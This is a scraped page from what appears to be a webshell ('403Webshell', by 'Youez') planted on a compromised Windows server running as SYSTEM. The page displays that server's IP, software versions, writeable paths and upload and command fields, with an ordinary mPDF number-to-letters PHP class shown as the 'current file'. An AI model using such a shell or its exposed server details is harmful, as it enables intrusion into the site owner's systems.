403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/game/vendor/mpdf/mpdf/src/Conversion/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/game/vendor/mpdf/mpdf/src/Conversion/DecToAlpha.php
<?php

namespace Mpdf\Conversion;

class DecToAlpha
{

	public function convert($valor, $toUpper = true)
	{
		// returns a string from A-Z to AA-ZZ to AAA-ZZZ
		// OBS: A = 65 ASCII TABLE VALUE
		if (($valor < 1) || ($valor > 18278)) {
			return '?'; //supports 'only' up to 18278
		}

		$c2 = $c3 = '';

		$c1 = 64 + $valor; // 1 letter (up to 26)
		if ($valor > 702) { // 3 letters (up to 18278)
			$c1 = 65 + floor(($valor - 703) / 676);
			$c2 = 65 + floor((($valor - 703) % 676) / 26);
			$c3 = 65 + floor((($valor - 703) % 676) % 26);
		} elseif ($valor > 26) { // 2 letters (up to 702)
			$c1 = (64 + (int) (($valor - 1) / 26));
			$c2 = (64 + ($valor % 26));
			if ($c2 === 64) {
				$c2 += 26;
			}
		}

		$alpha = chr($c1);

		if ($c2 !== '') {
			$alpha .= chr($c2);
		}

		if ($c3 !== '') {
			$alpha .= chr($c3);
		}

		if (!$toUpper) {
			$alpha = strtolower($alpha);
		}

		return $alpha;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit